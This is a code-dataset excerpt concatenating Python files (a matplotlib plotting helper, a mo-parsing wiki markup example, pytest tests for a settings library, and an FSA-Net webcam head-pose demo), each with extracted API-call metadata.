histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
        Draw a horizontal and/or vertical bar with the size in data coordinates
        of the given axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
    Adds a set of scale bars to *axis*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
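        # Shrink an oversized scalebar length until it fits within maxvalue, rounding
        # to a "nice" value; falls back to repeated division by 10 if the rounding fails.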
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
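# Illustrative usage only (assumes an existing matplotlib Axes object `ax`; the unit
# labels below are made up, not taken from this module):
#     add_scalebar(ax, matchx=True, matchy=True, unitsx='ms', unitsy='mV')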
| [((36, 29, 36, 58), 'copy.deepcopy', 'deepcopy', ({(36, 38, 36, 57): 'mpl.rcParamsDefault'}, {}), '(mpl.rcParamsDefault)', False, 'from copy import deepcopy\n'), ((74, 28, 74, 80), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((171, 8, 171, 41), 'matplotlib.style.use', 'mpl.style.use', ({(171, 22, 171, 40): 'self.orig_rcParams'}, {}), '(self.orig_rcParams)', True, 'import matplotlib as mpl\n'), ((341, 8, 341, 49), 'matplotlib.style.use', 'mpl.style.use', ({(341, 22, 341, 48): 'self.metafig.orig_rcParams'}, {}), '(self.metafig.orig_rcParams)', True, 'import matplotlib as mpl\n'), ((564, 15, 564, 46), 'matplotlib.offsetbox.AuxTransformBox', 'AuxTransformBox', ({(564, 31, 564, 45): 'axis.transData'}, {}), '(axis.transData)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((581, 8, 581, 123), 'matplotlib.offsetbox.AnchoredOffsetbox.__init__', 'AnchoredOffsetbox.__init__', (), '', False, 'from matplotlib.offsetbox import AnchoredOffsetbox\n'), ((69, 23, 69, 45), 'numpy.max', 'np.max', ({(69, 30, 69, 44): '[nrows, ncols]'}, {}), '([nrows, ncols])', True, 'import numpy as np\n'), ((118, 23, 118, 54), 'os.path.join', 'os.path.join', ({(118, 36, 118, 43): 'fileDir', (118, 45, 118, 53): 'fileName'}, {}), '(fileDir, fileName)', False, 'import os\n'), ((121, 18, 121, 42), 'os.path.isfile', 'os.path.isfile', ({(121, 33, 121, 41): 'fileName'}, {}), '(fileName)', False, 'import os\n'), ((156, 12, 156, 30), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((168, 12, 168, 31), 'matplotlib.pyplot.close', 'plt.close', ({(168, 22, 168, 30): 'self.fig'}, {}), '(self.fig)', True, 'import matplotlib.pyplot as plt\n'), ((193, 15, 193, 35), 'os.path.isfile', 'os.path.isfile', ({(193, 30, 193, 34): 'data'}, {}), '(data)', False, 'import os\n'), ((575, 26, 575, 42), 'matplotlib.offsetbox.TextArea', 'TextArea', ({(575, 35, 575, 41): 'labelx'}, {}), '(labelx)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((576, 19, 576, 88), 'matplotlib.offsetbox.VPacker', 'VPacker', (), '', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((578, 26, 578, 42), 'matplotlib.offsetbox.TextArea', 'TextArea', ({(578, 35, 578, 41): 'labely'}, {}), '(labely)', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((579, 19, 579, 88), 'matplotlib.offsetbox.HPacker', 'HPacker', (), '', False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((601, 24, 601, 59), 'numpy.abs', 'np.abs', ({(601, 31, 601, 58): 'tick_locs[1] - tick_locs[0]'}, {}), '(tick_locs[1] - tick_locs[0])', True, 'import numpy as np\n'), ((158, 12, 158, 30), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((568, 28, 568, 91), 'matplotlib.patches.Rectangle', 'Rectangle', (), '', False, 'from matplotlib.patches import Rectangle\n'), ((572, 28, 572, 91), 'matplotlib.patches.Rectangle', 'Rectangle', (), '', False, 'from matplotlib.patches import Rectangle\n')] |
klahnakoski/mo-parsing | examples/simpleWiki.py | 885bf3fd61430d5fa15164168b975b18988fcf9e | from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
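# Illustrative usage (assumption: this mo_parsing fork keeps pyparsing's transform-string
# API; the exact method name may be transform_string or transformString depending on version):
#     print(wikiMarkup.transform_string(wikiInput))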
| [((19, 13, 19, 30), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(19, 26, 19, 29): '"""*"""'}, {}), "('*')", False, 'from mo_parsing.helpers import QuotedString\n'), ((20, 9, 20, 27), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(20, 22, 20, 26): '"""**"""'}, {}), "('**')", False, 'from mo_parsing.helpers import QuotedString\n'), ((21, 17, 21, 36), 'mo_parsing.helpers.QuotedString', 'QuotedString', ({(21, 30, 21, 35): '"""***"""'}, {}), "('***')", False, 'from mo_parsing.helpers import QuotedString\n'), ((32, 9, 32, 48), 'mo_parsing.helpers.QuotedString', 'QuotedString', (), '', False, 'from mo_parsing.helpers import QuotedString\n')] |
wheelercj/app_settings | tests/test_app_settings_dict.py | 06224dec0b5baf1eeb92e5a81ca4e8385d4942a6 | import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
        prompt_user_for_all_settings=lambda: 1 / 0,  # raises ZeroDivisionError if the prompt is ever invoked
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
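    # Round-trips custom objects (Coords instances and compiled regex patterns)
    # through the setting_dumper/setting_loader callables, at two nesting levels.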
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| [((9, 15, 18, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((31, 15, 45, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((66, 15, 82, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((108, 15, 120, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((131, 15, 146, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((153, 15, 164, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((174, 15, 185, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((194, 15, 203, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((210, 15, 210, 25), 'app_settings_dict.Settings', 'Settings', ({}, {}), '()', False, 'from app_settings_dict import Settings\n'), ((218, 15, 223, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((235, 15, 241, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((282, 15, 288, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((294, 15, 300, 5), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((26, 9, 26, 32), 'pytest.raises', 'pytest.raises', ({(26, 23, 26, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((90, 9, 90, 32), 'pytest.raises', 'pytest.raises', ({(90, 23, 90, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((103, 9, 103, 34), 'pytest.raises', 'pytest.raises', ({(103, 23, 103, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((289, 9, 289, 32), 'pytest.raises', 'pytest.raises', ({(289, 23, 289, 31): 'KeyError'}, {}), '(KeyError)', False, 'import pytest\n'), ((301, 9, 301, 34), 'pytest.raises', 'pytest.raises', ({(301, 23, 301, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((344, 59, 346, 5), 're.compile', 're.compile', ({(345, 8, 345, 30): '"""\\\\d{3}-?\\\\d{3}-?\\\\d{4}"""'}, {}), "('\\\\d{3}-?\\\\d{3}-?\\\\d{4}')", False, 'import re\n'), ((347, 60, 349, 5), 're.compile', 're.compile', ({(348, 8, 348, 40): '"""[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+"""'}, {}), "('[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+')", False, 'import re\n'), ((353, 9, 353, 33), 'pytest.raises', 'pytest.raises', ({(353, 23, 353, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((354, 8, 354, 50), 'app_settings_dict.Settings', 'Settings', ({(354, 17, 354, 49): '"""sample settings file path.json"""'}, {}), "('sample settings file path.json')", False, 'from app_settings_dict import Settings\n'), ((253, 20, 257, 13), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((263, 20, 268, 13), 'app_settings_dict.Settings', 'Settings', (), '', False, 'from app_settings_dict import Settings\n'), ((325, 44, 325, 78), 're.compile', 're.compile', ({(325, 55, 325, 77): '"""\\\\d{3}-?\\\\d{3}-?\\\\d{4}"""'}, {}), "('\\\\d{3}-?\\\\d{3}-?\\\\d{4}')", False, 'import re\n'), ((326, 45, 328, 21), 're.compile', 're.compile', ({(327, 24, 327, 56): 
'"""[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+"""'}, {}), "('[\\\\w\\\\d.+-]+@[\\\\w\\\\d.-]+\\\\.[\\\\w\\\\d]+')", False, 'import re\n')] |
jacke121/FSA-Net | demo/demo_FSANET_ssd.py | c4d60bd38e9d17b0ea33d824ec443a01bdeba015 | import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
    if tdx is None or tdy is None:
        # No anchor point given: default to the image center
        height, width = img.shape[:2]
        tdx = width / 2
        tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
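    # For each SSD detection above the 0.5 confidence threshold: enlarge the face box
    # by the margin `ad`, crop/resize/normalize the face, predict (yaw, pitch, roll)
    # with the fused FSA-Net model, and draw the pose axes back onto the frame.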
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
                print('direction', time.time() - start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
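    # Fuse the three FSA-Net variants by averaging their (yaw, pitch, roll) outputs.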
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| [((6, 0, 6, 21), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((94, 4, 94, 38), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((141, 16, 141, 70), 'os.path.sep.join', 'os.path.sep.join', ({(141, 33, 141, 69): "['face_detector', 'deploy.prototxt']"}, {}), "(['face_detector', 'deploy.prototxt'])", False, 'import os\n'), ((142, 16, 143, 52), 'os.path.sep.join', 'os.path.sep.join', ({(142, 33, 143, 51): "['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel']"}, {}), "(['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])", False, 'import os\n'), ((144, 10, 144, 56), 'cv2.dnn.readNetFromCaffe', 'cv2.dnn.readNetFromCaffe', ({(144, 35, 144, 44): 'protoPath', (144, 46, 144, 55): 'modelPath'}, {}), '(protoPath, modelPath)', False, 'import cv2\n'), ((147, 10, 147, 29), 'cv2.VideoCapture', 'cv2.VideoCapture', ({(147, 27, 147, 28): '0'}, {}), '(0)', False, 'import cv2\n'), ((136, 16, 136, 25), 'keras.layers.Average', 'Average', ({}, {}), '()', False, 'from keras.layers import Average\n'), ((156, 26, 156, 45), 'numpy.shape', 'np.shape', ({(156, 35, 156, 44): 'input_img'}, {}), '(input_img)', True, 'import numpy as np\n'), ((163, 16, 163, 68), 'numpy.empty', 'np.empty', ({(163, 25, 163, 67): '(detected.shape[2], img_size, img_size, 3)'}, {}), '((detected.shape[2], img_size, img_size, 3))', True, 'import numpy as np\n'), ((168, 8, 168, 39), 'cv2.imshow', 'cv2.imshow', ({(168, 19, 168, 27): '"""result"""', (168, 29, 168, 38): 'input_img'}, {}), "('result', input_img)", False, 'import cv2\n'), ((169, 14, 169, 28), 'cv2.waitKey', 'cv2.waitKey', ({(169, 26, 169, 27): '1'}, {}), '(1)', False, 'import cv2\n'), ((39, 17, 39, 25), 'math.sin', 'sin', ({(39, 21, 39, 24): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((158, 37, 158, 70), 'cv2.resize', 'cv2.resize', ({(158, 48, 158, 57): 'input_img', (158, 59, 158, 69): '(300, 300)'}, {}), '(input_img, (300, 300))', False, 'import cv2\n'), ((30, 17, 30, 25), 